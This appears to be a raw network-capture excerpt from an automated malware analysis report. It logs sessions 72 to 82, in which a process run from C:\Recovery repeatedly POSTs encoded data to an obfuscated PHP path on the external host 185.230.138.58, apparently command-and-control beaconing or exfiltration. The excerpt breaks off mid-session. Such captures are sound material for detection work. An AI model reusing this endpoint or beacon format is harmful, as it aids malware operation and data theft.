                                                                                                                                        Dec 21, 2024 10:08:56.458858967 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:56.810981989 CET1012OUTData Raw: 52 55 5f 59 5f 45 54 51 5b 59 51 56 59 58 58 51 56 5a 5d 5b 5a 5b 5b 46 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RU_Y_ETQ[YQVYXXQVZ][Z[[F[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!-"?!/'%*)="R X)=?Z&[(9/V$?37&*'^& X/
                                                                                                                                        Dec 21, 2024 10:08:57.711416006 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:57.944411993 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:57 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        72192.168.2.449944185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:58.218163013 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:58.576517105 CET1012OUTData Raw: 57 51 5a 58 5f 44 51 57 5b 59 51 56 59 5c 58 5e 56 5b 5d 5b 5a 5e 5b 43 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WQZX_DQW[YQVY\X^V[][Z^[C[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!B;2(Y77X$?:X*#-9)<4&6+_/3><_$493*'^& X/0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        73192.168.2.449950185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:59.463335037 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1892
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:59.810986042 CET1892OUTData Raw: 57 50 5a 5c 5a 43 54 51 5b 59 51 56 59 5f 58 5f 56 5d 5d 5d 5a 5b 5b 47 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WPZ\ZCTQ[YQVY_X_V]]]Z[[G[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!A;T0_#%?)*54>>[*?([18)X(_+00Q50'^& X/<
                                                                                                                                        Dec 21, 2024 10:09:00.706782103 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:00.944516897 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:00 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 25 13 36 1b 05 54 26 3e 24 0f 27 3e 22 58 2b 10 02 07 24 5a 3a 1d 20 30 20 5c 28 3c 33 59 30 07 35 07 30 02 2b 0f 28 09 3f 5a 3a 30 20 46 04 1c 23 14 3c 55 2a 56 29 16 23 05 2f 28 07 58 3f 54 35 06 35 12 26 02 37 3d 22 5c 23 0f 39 19 2b 07 2d 0b 2a 0a 33 03 2e 3e 00 11 21 3a 23 56 0b 1f 39 52 3d 0e 29 07 27 37 3b 04 31 19 26 57 21 36 0e 0e 35 31 38 0c 21 5b 38 02 27 3b 26 5c 36 5e 24 54 3e 3f 0f 01 24 39 0d 0d 39 2d 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98%6T&>$'>"X+$Z: 0 \(<3Y050+(?Z:0 F#<U*V)#/(X?T55&7="\#9+-*3.>!:#V9R=)'7;1&W!6518![8';&\6^$T>?$99-&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        74192.168.2.449951185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:59.588157892 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:59.936024904 CET1012OUTData Raw: 52 54 5f 59 5f 40 51 52 5b 59 51 56 59 53 58 5e 56 5a 5d 58 5a 58 5b 45 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RT_Y_@QR[YQVYSX^VZ]XZX[E[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!F//4?&<_*= >">/ [%<: 004*Y$*'^& X/
                                                                                                                                        Dec 21, 2024 10:09:00.835999966 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:01.069523096 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:00 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        75192.168.2.449954185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:01.303452015 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:09:01.655920982 CET1012OUTData Raw: 57 53 5f 5b 5f 41 54 51 5b 59 51 56 59 5f 58 59 56 5e 5d 57 5a 5f 5b 45 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WS_[_ATQ[YQVY_XYV^]WZ_[E[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!C810 ??1/9=-5#"=?2(5X+:<00Q90'^& X/<
                                                                                                                                        Dec 21, 2024 10:09:02.547385931 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:02.784351110 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:02 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        76192.168.2.449959185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:03.022548914 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:03.373608112 CET1012OUTData Raw: 57 52 5f 5f 5a 40 51 55 5b 59 51 56 59 5e 58 51 56 59 5d 5b 5a 5a 5b 47 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WR__Z@QU[YQVY^XQVY][ZZ[G[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"/(_ ? %&*>6U7-9>1^"()$<'46]0'^& X/8
                                                                                                                                        Dec 21, 2024 10:09:04.280196905 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:04.512623072 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:04 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        77192.168.2.449964185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:04.762738943 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:05.108633995 CET1012OUTData Raw: 57 54 5f 58 5a 44 54 54 5b 59 51 56 59 52 58 5c 56 5e 5d 5b 5a 51 5b 42 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WT_XZDTT[YQVYRX\V^][ZQ[B[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!/2; <42&)>:4*^)&!<:/R0(\$793*'^& X/
                                                                                                                                        Dec 21, 2024 10:09:06.048156023 CET25INHTTP/1.1 100 Continue


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        78192.168.2.449970185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:06.075949907 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1892
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:06.420540094 CET1892OUTData Raw: 57 57 5f 5c 5a 45 51 5f 5b 59 51 56 59 53 58 5b 56 5f 5d 5f 5a 59 5b 48 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WW_\ZEQ_[YQVYSX[V_]_ZY[H[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!/"] #^&Z:)=64&_>,+%:))#'=8^$'>_3*'^& X/
                                                                                                                                        Dec 21, 2024 10:09:07.319907904 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:07.556369066 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:07 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 25 5a 35 1b 06 0a 31 3e 38 0d 30 2d 25 00 2b 3e 28 03 26 2c 00 1c 22 33 38 5d 3e 59 23 59 33 00 32 5e 24 02 06 55 3f 30 05 1f 3a 30 20 46 04 1c 20 01 28 0a 2a 52 2a 28 34 5d 2d 38 00 02 29 22 0b 02 21 02 2e 01 37 3e 2a 5a 23 21 0b 19 3c 39 29 0f 3e 27 3b 00 3a 3d 25 02 36 00 23 56 0b 1f 39 55 2b 23 39 02 33 24 20 5c 26 34 3e 51 34 36 24 0e 35 0c 28 08 23 2d 23 5a 31 16 3a 5c 35 06 3c 57 28 2f 32 13 25 5f 3f 09 3a 07 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98%Z51>80-%+>(&,"38]>Y#Y32^$U?0:0 F (*R*(4]-8)"!.7>*Z#!<9)>';:=%6#V9U+#93$ \&4>Q46$5(#-#Z1:\5<W(/2%_?:&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        79192.168.2.449971185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:06.200023890 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:06.546077967 CET1012OUTData Raw: 57 55 5a 5c 5a 42 54 52 5b 59 51 56 59 5e 58 5f 56 5e 5d 5b 5a 5e 5b 46 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WUZ\ZBTR[YQVY^X_V^][Z^[F[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!,<]7?&?9)[-#!)Y &;!Z+) 0>,Y'*^3*'^& X/8
                                                                                                                                        Dec 21, 2024 10:09:07.446022034 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:07.684536934 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:07 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        80192.168.2.449973185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:08.409636974 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:09:08.764177084 CET1012OUTData Raw: 57 55 5f 5e 5a 42 54 51 5b 59 51 56 59 5c 58 59 56 5d 5d 56 5a 51 5b 44 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WU_^ZBTQ[YQVY\XYV]]VZQ[D[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!G/!<^##%/*Z)[6U7><?2;"(W$.,'')''^& X/0
                                                                                                                                        Dec 21, 2024 10:09:09.653371096 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:09.888840914 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:09 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        81192.168.2.449979185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:10.129813910 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:09:10.483067989 CET1012OUTData Raw: 57 52 5a 58 5a 47 51 5e 5b 59 51 56 59 52 58 5f 56 53 5d 5d 5a 5b 5b 40 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WRZXZGQ^[YQVYRX_VS]]Z[[@[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX";T?7<%9>=U#X)=<7%+"(/R$<]'46''^& X/
                                                                                                                                        Dec 21, 2024 10:09:11.375648975 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:11.608587980 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:11 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        82192.168.2.449985185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:11.850169897 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:12.201738119 CET1012OUTData Raw: 57 55 5a 58 5f 42 51 51 5b 59 51 56 59 52 58 5f 56 59 5d 57 5a 51 5b 49 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
